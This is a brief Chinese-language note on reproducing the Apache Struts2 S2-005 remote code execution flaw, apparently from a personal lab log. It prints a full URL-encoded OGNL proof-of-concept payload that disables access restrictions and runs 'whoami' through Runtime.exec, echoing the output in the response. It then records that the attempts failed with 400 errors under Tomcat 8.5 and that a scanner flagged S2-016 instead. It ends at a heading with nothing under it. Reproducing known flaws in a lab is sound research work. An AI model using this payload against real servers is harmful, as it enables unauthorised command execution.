0x23. Apache Struts2远程代码执行漏洞(S2-005)复现
通过构造poc测试漏洞;
poc:%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29%3Dtrue&%28b%29%28%28%27\43context%5B\%27xwork.MethodAccessor.denyMethodExecution\%27%5D\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\[email protected]@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43mycmd\75\%27whoami\%27%27%29%28d%29%29&%28h%29%28%28%27\43myret\[email protected]@getRuntime%28%29.exec%28\43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27\43mydat\75new\40java.io.DataInputStream%28\43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27\43myres\75new\40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27\43mydat.readFully%28\43myres%29%27%29%28d%29%29&%28l%29%28%28%27\43mystr\75new\40java.lang.String%28\43myres%29%27%29%28d%29%29&%28m%29%28%28%27\43myout\[email protected]@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27\43myout.getWriter%28%29.println%28\43mystr%29%27%29%28d%29%29
但是怎么构造都显示400错误,无法回显;
经过测试是由于tomcat的版本是8.5的原因;
通过使用工具进行检测,发现检测到的是s2-016漏洞;
漏洞详情: